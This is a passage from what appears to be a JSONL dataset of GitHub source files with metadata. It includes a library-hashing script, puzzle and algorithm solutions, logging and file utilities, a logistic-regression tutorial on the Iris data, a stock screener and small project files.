in lines:\n linesplit = line.split('-')\n name = linesplit[:-1]\n (idnbr,checksum) = linesplit[-1].split('[')\n checksum = checksum[:-1]\n\n char_count = {}\n for word in name:\n for char in word:\n if not char in char_count:\n char_count[char] = 1\n else:\n char_count[char] += 1\n sorted_char_count = sorted(char_count.items(), key=operator.itemgetter(0))\n sorted_char_count = sorted(sorted_char_count, key=operator.itemgetter(1),\n reverse = True)\n if(''.join( [ x[0] for x in sorted_char_count[:5]]) == checksum):\n sum += int(idnbr)\n\nprint(sum)\n","repo_name":"RFjell/Advent-of-Code","sub_path":"day04/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35966220804","text":"import sys\nimport csv\nimport glob\nfrom os.path import exists\nimport subprocess\n\nflutter_file = 'libflutter.so'\nreact_native_file = 'libreact*.so'\n\nflutter_folders = ['arm64-v8a', 'armeabi-v7a', 'x86_64']\nreact_native_folders = flutter_folders + ['x86']\n\n# get the hash of libflutter.so file from arm64_v8a, armeabi_v7a, and x86_64 folders, then write them in the\n# corresponding .csv files.\ndef hash_flutter(version, path):\n path = add_slash_to_path(path)\n\n for folder in flutter_folders:\n csv_file = f'files/flutter/{folder}.csv'\n try:\n output = subprocess.check_output(one_file_command(path + folder + '\\\\' + flutter_file)).decode(\"utf-8\")\n\n start_index = output.find('so:') + 3\n end_index = output.find('CertUtil', start_index)\n output_hash = output[start_index+1: end_index].strip()\n\n finish = False\n versions_list = []\n\n if exists(csv_file):\n with open(csv_file, 'r') as csv_read:\n csv_reader = csv.reader(csv_read)\n for row in csv_reader:\n change = False\n for i in range(len(row)):\n if change:\n row[i] = output_hash\n change = False\n finish = True\n if row[i] == version:\n change = True\n if len(row) != 0:\n versions_list.append(row)\n\n with open(csv_file, 'w', newline='') as csv_write:\n writer = csv.writer(csv_write)\n writer.writerows(versions_list)\n\n if not finish:\n with open(csv_file, 'a') as csv_append:\n csv_append.write(version + ',' + output_hash)\n\n except subprocess.CalledProcessError as e:\n raise RuntimeError(\"Command '{}' return with error (code {}): {}\".format(e.cmd, e.returncode, e.output))\n\n\n# get the hash of libreact*.so file from arm64_v8a, armeabi_v7a, x86, and x86_64 folders, then write them in the\n# corresponding .csv files.\ndef hash_react_native(version, react_native_files):\n for filepath in react_native_files:\n splitted = str(filepath).split('\\\\')\n filename = splitted[len(splitted)-1]\n\n for folder in react_native_folders:\n csv_file = f'files/react_native/{folder}.csv'\n try:\n output = subprocess.check_output(one_file_command(filepath)).decode(\"utf-8\")\n\n start_index = output.find('so:') + 3\n end_index = output.find('CertUtil', start_index)\n output_hash = output[start_index + 1: end_index].strip()\n\n finish = False\n versions_list = []\n\n if exists(csv_file):\n with open(csv_file, 'r') as csv_read:\n csv_reader = csv.reader(csv_read)\n for row in csv_reader:\n change = False\n for i in range(len(row)):\n if change:\n row[i] = output_hash\n change = False\n finish = True\n if row[i] == version and row[i+1] == filename:\n change = True\n if len(row) != 0:\n versions_list.append(row)\n\n with open(csv_file, 'w', newline='') as csv_write:\n writer = csv.writer(csv_write)\n writer.writerows(versions_list)\n\n if not finish:\n with open(csv_file, 'a') as csv_append:\n csv_append.write(f'{version},{filename},{output_hash}')\n\n except subprocess.CalledProcessError as e:\n raise RuntimeError(\"Command '{}' return with error (code {}): {}\".format(e.cmd, e.returncode, e.output))\n\n\ndef one_file_command(filename):\n return 'certutil -hashfile \\\"' + filename + '\\\" SHA256'\n\n\ndef multiple_files_command(path, filename):\n return f'cd {path} && for %F in ({filename}) do @certutil -hashfile \\\"%F\\\" SHA256'\n\n\ndef add_slash_to_path(path):\n if not path.endswith('\\\\'):\n path += '\\\\'\n return path\n\n\ndef compare_versions(version1: str, version2: str):\n split1 = version1.split('.')\n split2 = version2.split('.')\n if split1[0] < split2[0]:\n return -1\n elif split1[0] > split2[0]:\n return 1\n elif split1[0] == split2[0]:\n if split1[1] < split2[1]:\n return -1\n elif split1[1] > split2[1]:\n return 1\n elif split1[1] == split2[1]:\n if split1[2] < split2[2]:\n return -1\n elif split1[2] > split2[2]:\n return 1\n elif split1[2] == split2[2]:\n return 0\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n raise Exception(f'Please specify the flutter version and the lib path!'\n f'Expected 2 arguments, but was {len(sys.argv)}.\\n'\n f'Make sure there are no spaces in the path.')\n\n path = add_slash_to_path(sys.argv[2])\n\n if exists(path + flutter_folders[0] + '\\\\' + flutter_file):\n hash_flutter(sys.argv[1], sys.argv[2])\n\n if glob.glob(path + react_native_folders[0] + '\\\\' + react_native_file):\n hash_react_native(sys.argv[1], glob.glob(path + react_native_folders[0] + '\\\\' + react_native_file))\n","repo_name":"arianneroselina/Frameworks-Lib-Hashes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71609994029","text":"from CreateMatrix import create_puzzle\nfrom funciones import *\n\n\ndef backtracking(n):\n \"\"\"\n Funcionalidades: Algoritmo que prueba todas las posibles soluciones de fichas en una matriz de tamaño doble n. Posee una poda que\n al detectar una solución incorrecta, inmediatamente descarta dicha solución y sigue con la siguiente, no termina de evaluarla.\n Entradas: int n\n Salidas: list que contiene en la primera posición la lista de soluciones y en la segunda la matriz generada\n \"\"\"\n print(\"creando matriz\")\n matriz = create_puzzle(n) #MATRIZ ALEATORIA\n cBits = cantidadBits(n)\n listaSoluciones = (posiblesSoluciones(cBits)) #TODAS LAS POSIBLES SOLUCIONES\n listaSolucionesValid = []\n print(\"incio corrida\")\n for solucionAct in listaSoluciones:\n x = 0\n y = 0\n matrizTemp = copy.deepcopy(matriz) #MATRIZ TEMPORAL QUE AYUDARÁ A REGISTRAR LAS POSICIONES USADAS\n try:\n solValida = True\n fichasUsadas = []\n for posFicha in solucionAct: \n while matrizTemp[x][y] == -1: #SE COMPRUEBA SI LA POS ACTUAL FUE USADA\n y+=1 #DE SER ASÍ LA AUMENTA \n if y >= (n+2): #SI LLEGÓ AL LIMITE DE LA MATRIZ (ANCHURA) \n y = 0\n x += 1 #PASA A LA SIGUIENTE FILA\n if int(posFicha) == 0: #CASO FICHA HORIZONTAL\n fichaAct = (matriz[x][y], matriz[x][y+1])\n matrizTemp[x][y] = -1\n matrizTemp[x][y+1] = -1\n y+=2\n else: #CASO FICHA VERTICAL\n fichaAct = (matriz[x][y], matriz[x+1][y])\n matrizTemp[x][y] = -1\n matrizTemp[x+1][y] = -1\n y+=1\n if y >= (n+2): #COMPRUEBA SI SE LLEGÓ AL LÍMITE DE LA MATRIZ\n y = 0\n x += 1 #DE SER ASÍ AUMENTA FILA\n if fichaAct in fichasUsadas or (fichaAct[1],fichaAct[0]) in fichasUsadas: #COMPRUEBA QUE LA FICHA NO HAYA SIDO USADA\n solValida = False #SI YA SE USÓ, DESCARTA LA SOLUCIÓN ACTUAL\n break #DETIENE LA EVALUACIÓN DE LA SOLUCIÓN ACTUAL Y CONTINUA CON LA SIGUIENTE\n fichasUsadas.append(fichaAct)\n if solValida: #AL FINALIZAR LA REVISIÓN DE LA SOLUCIÓN, SI ES VÁLIDA LA AGREGA\n if verificarResultado(matrizTemp): #A LA LISTA DE SOLUCIONES\n listaSolucionesValid.append(solucionAct)\n except:\n \"\"\n print(\"Soluciones válidas:\\n\\n\\n\")\n print(listaSolucionesValid)\n return [listaSolucionesValid, matriz]","repo_name":"DASBCC/AA_ProyectoDomino","sub_path":"backtracking.py","file_name":"backtracking.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29729923867","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Utility functions shared across the project.\"\"\"\n\nfrom collections import defaultdict\nimport json\nimport logging\nimport os\nimport pickle\n\n\ndef nested_defaultdict():\n \"\"\"Allow to avoid Pickle errors with lambdas.\n\n This function is defined in order to avoid Pickle errors. E.g.:\n\n >>> AttributeError: Can't pickle local object # doctest: +SKIP\n ... 'TwitterCorpusReader.ngram_frequencies..'\n\n Returns:\n a `defaultdict` of integers.\n\n NOTE:\n Functions are pickled by name, not by code. Unpickling will only\n work if a function with the same name is present in in the same\n module. This is why pickling a lambda won't work: they have no\n individual names.\n\n \"\"\"\n return defaultdict(int)\n\ndef merge_dictionaries_summing(first_dict, second_dict):\n \"\"\"Merge two dictionaries summing values with the same key.\n\n Args:\n first_dict (defaultdict): A defaultdict dictionary.\n second_dict (defaultdict): A defaultdict dictionary.\n\n Returns:\n The enriched version of the first dictionary (it works in place). The\n returned object is of type `defaultdict`.\n\n Note:\n This only works only with two input objects for the moment. Later\n improvements could be made, if needed.\n\n \"\"\"\n for k, v in second_dict.items():\n first_dict[k] += v\n return first_dict\n\ndef save_file(content, output_file_path):\n \"\"\"Save content to output file.\n\n The implementation needed to save the specific file type is evaluated\n based on the filename extension.\n\n Args:\n content: The content that has to be stored\n output_file_path (str): The path to the output file where the content\n will be stored.\n\n \"\"\"\n # Detect format from file name\n _, ext = os.path.splitext(output_file_path)\n save = _find_IO_function('save', ext)\n save(content, output_file_path)\n\ndef load_file(file_path):\n \"\"\"Load content from file.\n\n The implementation needed to load the specific file type is evaluated\n based on the filename extension.\n\n Args:\n file_path (str): The path to the file to be loaded.\n\n Returns:\n The loaded file content.\n\n \"\"\"\n # Detect format from file name\n _, ext = os.path.splitext(file_path)\n load = _find_IO_function('load', ext)\n return load(file_path)\n\ndef convert_unknown_arguments(dictionary):\n \"\"\"Convert strings in dictionary to their proper typed values.\n\n Digits are automatically evaluated by json. We need to evaluate\n booleans.\n\n Args:\n dictionary (dict): The dictionary whose values need to be converted.\n\n >>> ex_dict = { 'flag': 'true', 'verbose': 'False' }\n >>> convert_unknown_arguments(ex_dict) == {'flag': True, 'verbose': False}\n True\n\n \"\"\"\n if not dictionary:\n return\n for k, v in dictionary.items():\n # if v.isdigit():\n # dictionary[k] = int(v)\n if _is_true(v):\n dictionary[k] = True\n elif _is_false(v):\n dictionary[k] = False\n return dictionary\n\n# Private functions\n\ndef _save_result(result, output_file):\n res_list = []\n # If file does not exist or it is empty\n if not os.path.isfile(output_file) or os.path.getsize(output_file) == 0:\n res_list.append(result)\n with open(output_file, mode='w') as f:\n f.write(json.dumps(result, indent=2))\n else:\n with open(output_file, 'r') as feeds_json:\n previous_results = json.load(feeds_json)\n\n for k, v in result.items():\n if k in previous_results:\n previous_results[k].update(v)\n else:\n previous_results[k] = v\n\n with open(output_file, mode='w') as f:\n f.write(json.dumps(previous_results, indent=2))\n\ndef _save_as_pickle(content, output_file_path):\n logging.info(\"Writing pickle file: %s\", output_file_path)\n pickle.dump(content, open(output_file_path, \"wb\"))\n\ndef _save_as_json(content, output_file_path, indent=2):\n logging.info(\"Writing json file: %s\", output_file_path)\n with open(output_file_path, mode='w') as f:\n f.write(json.dumps(content, indent=indent))\n\ndef _save_generic_file(content, output_file_path):\n with open(output_file_path, 'w') as f:\n f.write(content)\n\ndef _find_IO_function(operation, extension):\n \"\"\"If the extension is supported, return the related saving function for\n that specific file type. Otherwise, return reference to a generic saving\n function. Supported `operation` values: 'save', 'load'.\n\n \"\"\"\n return _supported_formats_functions()[operation].get(\n extension, _save_generic_file)\n\ndef _load_json_file(input_file):\n with open(input_file) as in_file:\n result = json.load(in_file)\n return result\n\ndef _load_pickle_file(input_file):\n return pickle.load(open(input_file, \"rb\"))\n\ndef _configure_logger(loglevel):\n \"\"\"Configure logging levels.\"\"\"\n logging.basicConfig(\n format='%(levelname)s : %(message)s', level=logging.DEBUG)\n logging.basicConfig(level=loglevel)\n\n# def _is_number(n):\n# try:\n# float(n)\n# return True\n# except ValueError:\n# return False\n\ndef _is_true(value):\n return value in ['True', 'true']\n\ndef _is_false(value):\n return value in ['False', 'false']\n\ndef _supported_formats_functions():\n return {\n 'save': {\n '.json' : _save_as_json,\n '.pickle': _save_as_pickle\n },\n 'load': {\n '.json' : _load_json_file,\n '.pickle': _load_pickle_file\n }\n }\n","repo_name":"fievelk/pylade","sub_path":"pylade/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"15528319108","text":"import json\nfrom asyncio import Queue\nfrom enum import Enum\nfrom typing import Optional, Tuple, Any\n\n\nclass JobState:\n def __init__(self):\n self.state = None\n self.q = Queue()\n\n def mark_success(self, value):\n self.state = (True, value)\n self.q.put_nowait(self.state)\n\n def mark_failure(self, reason):\n self.state = (False, reason)\n self.q.put_nowait(self.state)\n\n async def wait_for_value(self):\n return await self.q.get()\n\n\nclass MessageType(Enum):\n Submit = \"SUBMIT\"\n SubmitAck = \"SUBMIT_ACK\"\n Bid = \"BID\"\n BidAck = \"BID_ACK\"\n BidReject = \"BID_REJECT\"\n JobSuccess = \"JOB_SUCCESS\"\n JobFailure = \"JOB_FAILURE\"\n Cancel = \"CANCEL\"\n\n\nclass Message:\n def __init__(self, **attrs):\n if \"type\" in attrs and isinstance(attrs[\"type\"], MessageType):\n attrs[\"type\"] = attrs[\"type\"].value\n self.__raw = attrs\n for k, v in attrs.items():\n setattr(self, k, v)\n\n def is_a(self, message_type: MessageType):\n return hasattr(self, \"type\") and self.type == message_type.value\n\n def get(self, attr, default):\n return getattr(self, attr, default)\n\n @classmethod\n def decode(cls, raw):\n return Message(**json.loads(raw))\n\n def encode(self):\n return json.dumps(self.__raw)\n","repo_name":"bidq/pybidq","sub_path":"bidq/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29528071807","text":"# Here we introduce Data science by starting with a common regression model(logistic regression). The example uses the Iris Dataset\n# We also introduce Python as we develop the model. (The Iris dataset section is adatped from an example from Analyics Vidhya) \n# Python uses some libraries which we load first. \n# numpy is used for Array operations\n# mathplotlib is used for visualization\n\nimport numpy as np\nimport matplotlib as mp\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\n\ndataset = datasets.load_iris()\n\n# Display the data\ndataset\n\n# first we need to understand the data\n\nfrom IPython.display import Image\nfrom IPython.core.display import HTML\nImage(\"https://upload.wikimedia.org/wikipedia/commons/5/56/Kosaciec_szczecinkowaty_Iris_setosa.jpg\")\n\nImage(\"http://www.opengardensblog.futuretext.com/wp-content/uploads/2016/01/iris-dataset-sample.jpg\")\n\n# In statistics, linear regression is an approach for modeling the relationship between a scalar dependent variable y \n# and one or more explanatory variables (or independent variables) denoted X. There are differnt types of regressions that model the\n# relationship between the independent and the dependent variables \n\n# In linear regression, the relationships are modeled using linear predictor functions whose unknown model \n# parameters are estimated from the data. Such models are called linear models.\n\n# In mathematics, a linear combination is an expression constructed from a set of terms by multiplying \n# each term by a constant and adding the results (e.g. a linear combination of x and y would be any expression of the \n# form ax + by, where a and b are constants)\n\n# Linear regression\nImage(\"https://www.biomedware.com/files/documentation/spacestat/Statistics/Multivariate_Modeling/Regression/regression_line.png\")\n\nImage(url=\"http://31.media.tumblr.com/e00b481257fac723638b32271e611a2f/tumblr_inline_ntui2ohGy41sfzcxh_500.gif\")\n\nmodel = LogisticRegression()\nmodel.fit(dataset.data, dataset.target)\n\nexpected = dataset.target\npredicted = model.predict(dataset.data)\n\n# classification metrics report builds a text report showing the main classification metrics\n# In pattern recognition and information retrieval with binary classification, \n# precision (also called positive predictive value) is the fraction of retrieved instances that are relevant, \n# while recall (also known as sensitivity) is the fraction of relevant instances that are retrieved. \n# Both precision and recall are therefore based on an understanding and measure of relevance. \n# Suppose a computer program for recognizing dogs in scenes from a video identifies 7 dogs in a scene containing 9 dogs \n# and some cats. If 4 of the identifications are correct, but 3 are actually cats, the program's precision is 4/7 \n# while its recall is 4/9.\n\n# In statistical analysis of binary classification, the F1 score (also F-score or F-measure) is a measure of a test's accuracy. \n# It considers both the precision p and the recall r of the test to compute the score: \n# p is the number of correct positive results divided by the number of all positive results, \n# and r is the number of correct positive results divided by the number of positive results that should have been returned. \n# The F1 score can be interpreted as a weighted average of the precision and recall\n\nprint(metrics.classification_report(expected, predicted))\n\n# Confusion matrix \n# https://en.wikipedia.org/wiki/Confusion_matrix\n# In the field of machine learning, a confusion matrix is a table layout that allows visualization of the performance \n# of an algorithm, typically a supervised learning one. \n# Each column of the matrix represents the instances in a predicted class \n# while each row represents the instances in an actual class (or vice-versa)\n\n# If a classification system has been trained to distinguish between cats, dogs and rabbits, \n# a confusion matrix will summarize the results of testing the algorithm for further inspection. \n# Assuming a sample of 27 animals — 8 cats, 6 dogs, and 13 rabbits, the resulting confusion matrix \n# could look like the table below:\n\nImage(\"http://www.opengardensblog.futuretext.com/wp-content/uploads/2016/01/confusion-matrix.jpg\")\n\n# In this confusion matrix, of the 8 actual cats, the system predicted that three were dogs, \n# and of the six dogs, it predicted that one was a rabbit and two were cats. \n# We can see from the matrix that the system in question has trouble distinguishing between cats and dogs, \n# but can make the distinction between rabbits and other types of animals pretty well. \n# All correct guesses are located in the diagonal of the table, so it's easy to visually \n# inspect the table for errors, as they will be represented by values outside the diagonal.\n\nprint (metrics.confusion_matrix(expected, predicted))\n\nimport pandas as pd\n\nintegers_list = [1,3,5,7,9] # lists are seperated by square brackets\nprint(integers_list)\ntuple_integers = 1,3,5,7,9 #tuples are seperated by commas and are immutable\nprint(tuple_integers)\ntuple_integers[0] = 11\n\n#Python strings can be in single or double quotes\nstring_ds = \"Data Science\"\n\nstring_iot = \"Internet of Things\"\n\nstring_dsiot = string_ds + \" for \" + string_iot\n\nprint (string_dsiot)\n\nlen(string_dsiot)\n\n# sets are unordered collections with no duplicate elements\nprog_languages = set(['Python', 'Java', 'Scala'])\nprog_languages\n\n# Dictionaies are comma seperated key value pairs seperated by braces\ndict_marks = {'John':95, 'Mark': 100, 'Anna': 99}\n\ndict_marks['John']\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/03 Supervised Learning - 00 Python basics and Logistic Regression.py","file_name":"03 Supervised Learning - 00 Python basics and Logistic Regression.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25674167897","text":"from tensorboardX import SummaryWriter\nimport torch\nimport os\nimport random\nimport matplotlib as mpl\nfrom utils.visualization_util import normalize\n\nmpl.use('Agg')\n\ntry:\n from StringIO import StringIO # Python 2.7\nexcept ImportError:\n from io import BytesIO as StringIO\n\n\nclass ScalarMeanTracker(object):\n def __init__(self) -> None:\n self._sums = {}\n self._counts = {}\n\n def add_scalars(self, scalars):\n for k in scalars:\n if k not in self._sums:\n self._sums[k] = scalars[k]\n self._counts[k] = 1\n else:\n self._sums[k] += scalars[k]\n self._counts[k] += 1\n\n def pop_and_reset(self):\n means = {k: self._sums[k] / self._counts[k] for k in self._sums}\n self._sums = {}\n self._counts = {}\n return means\n\n\nclass LoggingModule(object):\n def __init__(self, args, log_dir):\n print('initializing logger', log_dir)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n self.qualitative_dir = args.qualitative_dir\n self.mode = args.mode\n self.log_writer = SummaryWriter(log_dir=log_dir)\n self.number_of_items_to_visualize = 10\n self.render = args.render\n\n def recursive_write(self, item_to_write, epoch_number, add_to_keys=''):\n if type(item_to_write) == dict:\n for res in item_to_write:\n sub_item = item_to_write[res]\n new_translated_key = add_to_keys + '/' + res\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n elif type(item_to_write) == torch.Tensor and len(item_to_write.shape) == 2:\n seq_len, joint_len = item_to_write.shape\n for seq_ind in range(seq_len):\n sub_item = item_to_write[seq_ind].mean()\n new_translated_key = add_to_keys + '/' + 'seq_ind_{}'.format(seq_ind)\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n for joint_ind in range(joint_len):\n sub_item = item_to_write[:, joint_ind].mean()\n new_translated_key = add_to_keys + '/' + 'joint_ind_{}'.format(joint_ind)\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n self.recursive_write(item_to_write.mean(), epoch_number, add_to_keys=add_to_keys + '/' + 'overall')\n elif type(item_to_write) == torch.Tensor and len(item_to_write.shape) == 1:\n seq_len = len(item_to_write) # equal to item_to_write.shape[0]\n for seq_ind in range(seq_len):\n sub_item = item_to_write[seq_ind]\n new_translated_key = add_to_keys + '/' + 'seq_ind_{}'.format(seq_ind)\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n self.recursive_write(item_to_write.mean(), epoch_number, add_to_keys=add_to_keys + '/' + 'overall')\n else:\n self.log_writer.add_scalar(\n add_to_keys, item_to_write, epoch_number\n )\n\n def subplot_summary(self, subplot_image_sequence, step, add_to_keys):\n sequence_length = len(subplot_image_sequence)\n for seq_index in range(sequence_length):\n output = subplot_image_sequence[seq_index].transpose(2, 0, 1)\n self.log_writer.add_image(tag=\"%s/time_%d_output\" % (add_to_keys, step), img_tensor=output, global_step=step + seq_index)\n\n def image_summary(self, output_images, target_images, step, add_to_keys):\n\n batch_size, sequence_length, _, _, _ = output_images.shape\n\n # img_summaries = []\n batch_to_visualize = random.randint(0, batch_size - 1)\n for seq_index in range(sequence_length):\n output = output_images[batch_to_visualize, seq_index].cpu()\n target = target_images[batch_to_visualize, seq_index].cpu()\n\n output = normalize(output)\n target = normalize(target)\n\n self.log_writer.add_image(tag=\"%s/time_%d_output\" % (add_to_keys, seq_index), img_tensor=output, global_step=step)\n self.log_writer.add_image(tag=\"%s/time_%d_target\" % (add_to_keys, seq_index), img_tensor=target, global_step=step)\n\n def log(self, dict_res, epoch_number, add_to_keys=''):\n for k in dict_res:\n if add_to_keys != '':\n translated_k = k + '/' + add_to_keys\n else:\n translated_k = k\n self.recursive_write(dict_res[k], epoch_number, add_to_keys=translated_k)\n","repo_name":"ehsanik/touchTorch","sub_path":"utils/logging_util.py","file_name":"logging_util.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"38"} +{"seq_id":"1392681233","text":"from Data7 import Data as data\nfrom Scan import Scan as scan\n\nimport datetime\n\nimport pandas as pd\nimport statistics\nimport mplfinance as mpf\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport random\nfrom Log3 import Log as log\nfrom multiprocessing import Pool\n\n\n\n\n\nclass Pivot:\n\tdef pivot(df,current, tf, ticker, path):\n\n\n\t\t########################################################################\n\t\t\n\t\tz_filter = 1.5\n\t\tcoef_filter = .5\n\t\t\n\t\t\n\t\tatr= []\n\t\tadr_l = 14\n\t\tfor j in range(adr_l): \n\t\t\thigh = df.iat[current-j-1,1]\n\t\t\tlow = df.iat[current-j-1,2]\n\t\t\tval = (high - low ) \n\t\t\tatr.append(val)\n\t\tatr = statistics.mean(atr) \n\n\t\ti = 2\n\n\t\tdef MA(df,i,l):\n\t\t\tma = []\n\t\t\tfor j in range(l):\n\t\t\t\tma.append(df.iat[i-j,3])\n\t\t\treturn statistics.mean(ma)\n\n\t\tma = MA(df,current-1,2)\n\t\twhile True:\n\t\t\tprevma = MA(df,current-i,2)\n\t\t\tif ma > prevma or i > 10:\n\t\t\t\tbreak\n\n\t\t\tma = prevma\n\t\t\ti += 1\n\n\t\ti -= 1\n\t\n\t\td = []\n\t\tfor k in range(20):\n\t\t\tc = df.iat[current - 2 - k,3]\n\t\t\to = df.iat[current - 1 - k,0]\n\t\t\td.append(o/c - 1)\n\n\t\tval = df.iat[current,0]/df.iat[current-1,3] - 1\n\t\tz = (val - statistics.mean(d))/statistics.stdev(d)\n\n\t\tcoef = (df.iat[current,0] - df.iat[current-1,3])/(df.iat[current-i,0] - df.iat[current-1,3])\n\t\tsetup = None\n\t\t#if coef > coef_filter and z > z_filter and df.iat[current-2,3] > df.iat[current-1,3] and df.iat[current-2,3] - df.iat[current-2,0] < atr/3 and df.iat[current,0] > df.iat[current-1,0]:\n\t\t#\tsetup = 'P'\n\n\t\tif coef > coef_filter and z < -z_filter and df.iat[current-2,3] < df.iat[current-1,3] and df.iat[current-2,0] - df.iat[current-2,3] < atr/3 and df.iat[current,0] < df.iat[current-1,0]:\n\t\t\tsetup = 'NP'\n\n\t\tmc = mpf.make_marketcolors(up='g',down='r')\n\t\ts = mpf.make_mpf_style(marketcolors=mc)\n\t\tif setup != None:\n\n\t\t\thigh = 0\n\t\t\tlow = df.iat[current-1,2]\n\t\t\tfor i in range(3):\n\t\t\t\tval = df.iat[current-i,0]\n\t\t\t\tif val > high:\n\t\t\t\t\thigh = val\n\t\t\t\t\n\t\t\tval = (high - low)/atr\n\t\t\tif path == None:\n\t\t\t\tmpf.plot(df, type='candle', style=s,title = str(f' {setup} , {round(z,3)} , {coef} '))\n\t\t\telse:\n\t\t\t\tlog.log(df,current, tf, ticker, z, path, setup) \n\n\n\n\nif __name__ == '__main__':\n\n\tdate_list = ['2021-05-20','2023-03-29','2022-11-10','2022-09-13','2022-08-10','2022-07-27',\n\t\t\t\t '2022-11-10','2023-01-06','2023-01-20','2023-01-09']\n\n\tticker_list = ['coin','qqq','qqq','qqq','qqq','qqq',\n\t\t\t\t 'mgni','aehr','nflx','coin']\n\n\n\ttf = 'd'\n\n\ttickers = scan.get().index.to_list()\n\ttest = False\n\tccccc = -1\n\n\n\tstartdate = datetime.date(2020, 1, 1)\n\tenddate = datetime.datetime.now()# - datetime.timedelta(date_buffer)\n \n\n\n\n\tsample = data.get('AAPL',tf)\n\tstart_index = data.findex(sample,startdate) \n\tend_index = data.findex(sample, enddate)\n \n\t#print(f'{start_index} , {end_index}')\n\ttrim = sample[start_index:end_index]\n\tdate_list = trim.index.tolist()\n\n\n\n\n\twhile True:\n\t\tccccc += 1\n\t\ttry:\n\t\t\tif not test:\n\t\t\t\tdh = random.randint(0,len(tickers) - 1)\n\t\t\t\tticker = tickers[dh]\n\t\t\t\tdfg = data.get(ticker)\n\t\t\t\tind = random.randint(0,len(dfg)-1)\n\t\t\t\tdate = dfg.index[ind]\n\t\t\telse:\n\t\t\t\tticker = 'spy'#ticker_list[ccccc]\n\t\t\t\tdate = date_list[ccccc]\n\t\t\tl = 20\n\t\t\tz_filter = 2\n\t\t\tdf = data.get(ticker)\n\t\t\tindex = data.findex(df,date)+1\n\t\t\tdf = df[index - 200:index]\n\t\t\tcurrent = len(df) - 1\n\n\t\t\tdol_vol_l = 5\n\t\t\tdolVol = []\n\t\t\tfor i in range(dol_vol_l):\n\t\t\t\tdolVol.append(df.iat[current-1-i,3]*df.iat[current-1-i,4])\n\t\t\tdolVol = statistics.mean(dolVol) \n\t\t\n\t\t\tvol_filter = 5 * 1000000\n\t\t\tpath = None\n\t\t\tif dolVol > vol_filter:\n\t\t\t\tPivot.pivot(df,current, tf, ticker, path)\n\n\n\n\t\texcept:\n\t\t\tpass\n\n\n\n\n","repo_name":"Andrew50/Screener2","sub_path":"Old/pivot.py","file_name":"pivot.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29953317672","text":"n = int(input())\nl = list(map(int, list(input().split())))\n\ns = sum(l)\ntemp = 0\nif n == 2:\n print(abs(l[-1] - l[0]))\n exit(0)\n\nfor i in range(n):\n if temp >= s - temp:\n print(\n min(abs(2*temp-s), abs(2*(temp-l[i-1])-s))\n )\n exit(0)\n temp += l[i]\n\nprint(abs(2*l[-1]-s))\n","repo_name":"N9199/Programacion-Competitiva","sub_path":"ICPCCL/2019/Day 2/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18527518557","text":"from django.db import models\nfrom Jardin.models import Jardin\nfrom Plante.models import Plante\nclass Contenu(models.Model):\n jardin=models.ForeignKey(Jardin,on_delete=models.CASCADE)\n plante=models.ForeignKey(Plante,on_delete=models.CASCADE)\n qte=models.IntegerField()\n datePlantation=models.DateTimeField(max_length=50)\n def __str__(self):\n return self.datePlantation\n ","repo_name":"NassimEloualydy/Django-App-With-PostgreSql-and-Ajax","sub_path":"Contenu/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71119991472","text":"import pygame\nimport random\nimport time\nimport math\n\nEPS = 1e-12\nCOLLIDE_TREE_MIN_SIZE = 5\n\nFPS = 59\nFPS_TIME = 1. / FPS\nCOLOR_BG = pygame.Color(23, 23, 23)\nPIX_PER_METER = 100\nSCREEN_HEIGHT = 976\nSCREEN_WIDTH = 1688\n\nMU = 0.3\nDOWNWARD_G = 9.8\nINTER_G = 6.67 * 1e-11\n# K_AIR = 1.2258\nK_AIR = 1e10\nKEY_ACC = 25\nKEY_ACC_FOR_ALL = True\nK_ELASTIC = 1e12\n\nRIGID = 5\nDEAD_COUNT = 1\nBALL_COUNT = RIGID * RIGID - 1\n\nDOWNWARD_GRAVITY_ON = False\nINTER_GRAVITY_ON = True\n\nELASTIC_COLLISION_ON = True\n\nAVOID_INTER_SUBMERGE = False\nCANCEL_INTER_GRAVITY_WHEN_COLLIDE = True\nAVOID_EDGE_SUBMERGE = True\n\n# 可以控制的球\nWEIGHT1 = 1e12\n# 不可控制的球\nWEIGHT2 = 1e10\n\nIMG_SRC1 = 'pic/saturn-256.png'\nIMG_SRC2 = 'pic/saturn-48.png'\nRIGID_DIS = 2.0\n\n\nRIGID_ELASTIC_NUM = 